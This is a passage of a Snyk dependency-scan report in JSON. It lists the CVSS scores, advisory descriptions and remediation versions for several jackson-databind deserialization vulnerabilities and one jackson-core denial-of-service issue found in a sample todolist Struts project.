"cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "cvssV3BaseScore": 6.8, - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.565013Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:43.143163Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.774444Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.85710", - "probability": "0.01257", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14721" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9mxf-g3x6-wv74" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:25:40.161831Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:24:46Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-10-11T17:24:39Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:21.774444Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - 
"cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.690019Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.100058Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.043196Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19362" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c8hm-7hpq-7jhg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:19.256477Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.043196Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": 
"critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.593938Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:04.422288Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:34.457712Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19360" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f9hv-mg5h-xcw9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:23.673097Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:44Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:34.457712Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Wuguixiong" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2186", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", - "title": "GitHub Release Tag" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": 
"critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.548577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.110184Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:22.091904Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", - "epssDetails": { - "percentile": "0.81590", - "probability": "0.00788", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-19361" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx9v-gmh4-mgqw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-01-03T14:17:31.715185Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-01-02T19:18:43Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-01-03T17:01:51Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:22.091904Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Alessio Soldano" - ], - "semver": { - "vulnerable": [ - "[,2.8.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", - "className": "UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", - "className": "ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/pull/322", - "title": "GitHub PR" - }, - { - "url": "https://issues.jboss.org/browse/JBEAP-6316", - "title": "Jira Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - 
"assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:01.546686Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time 